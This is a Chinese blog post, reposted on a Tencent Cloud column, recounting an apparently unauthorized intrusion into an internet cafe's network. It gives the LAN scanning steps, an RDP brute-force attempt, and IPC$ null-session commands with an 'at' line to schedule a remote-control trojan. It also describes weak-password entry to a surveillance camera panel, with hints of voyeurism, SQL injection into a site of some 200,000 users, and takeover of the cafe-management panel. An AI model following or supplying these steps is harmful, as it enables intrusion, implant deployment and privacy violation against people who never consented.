前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >实战渗透网吧

实战渗透网吧

作者头像
网e渗透安全部
发布2020-02-26 11:13:28
2.5K0
发布2020-02-26 11:13:28
举报
文章被收录于专栏:白安全组白安全组

首先我的内网IP是:

确定局域网的网段:192.168.0.1-192.168.0.254

使用的工具(啊D网络工具包:啊D网络工具包 扫描工具 V2.02 修正版 下载 安全自检)

进入:DTools2.02文件夹打开DTools.exe

进行对这些IP的端口扫描:

3389开放情况:

192.168.0.248 3389号端口打开

192.168.0.250 3389号端口打开

进行了3389端口爆破(工具:3389爆破工具 安全自检)

但是搞不定,没办法,大概扫描了下也没发现服务器的漏洞。

没办法,来扫描看下有哪些是开了共享的:

测试看了下就这个load目录共享了:

好,我们来试试IPC$入侵。

命令:

net use \\ip\ipc$ "pass" /user: "name"

这边我们是空口令直接使用:

net use \\192.168.0.241\ipc$ /user:"administrator"

想要上传个被控端却发现瘠薄没权限:

C:\Users\Administrator>copy 1.exe \\192.168.0.241\load

如果这样是可以上传的,我们就可以让他定时运行这个被控端,就可以上线了!!命令:

at \\192.168.0.241 时:分 1.exe

我从服务端入侵开始转到了WEB层的渗透了,扫描80、8080、81端口:

192.168.0.12

192.168.0.200

192.168.0.239

192.168.0.247

192.168.0.208

192.168.0.207

192.168.0.202

192.168.0.201

192.168.0.203

192.168.0.205

192.168.0.254

192.168.0.206

192.168.0.204

192.168.0.245:8080

192.168.0.246:8080

192.168.0.250:8080

192.168.0.247:81

经过人工检测发现这几个可以利用的站点:

1.监控管理 :http://192.168.0.239/

(可以看妹子、还可以嘿嘿嘿) 思路:admin/adminxr 弱口令进入

2.网吧在线棋牌 : http://192.168.0.247/

后期发现开着81端口就是管理后台:

前台一枚注入:/NewsList.aspx?id=1(时间问题没截图)

直接进后台:

(亲测数据量 20多万用户 未脱裤)

3.pubwin 2015 web管理 : http://192.168.0.245:8080/NetCafe/

直接Burpsuite怼起:

后台就进来了。(可以导致整个网吧电脑关机)

后来,我截图发微信给网咖老板,老板来亲自道歉!点到为止。

4.控制个人电脑:

...可以进行嘿嘿嘿,不过还是要遵守法律法规哦

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2020-02-23,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 白安全组 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档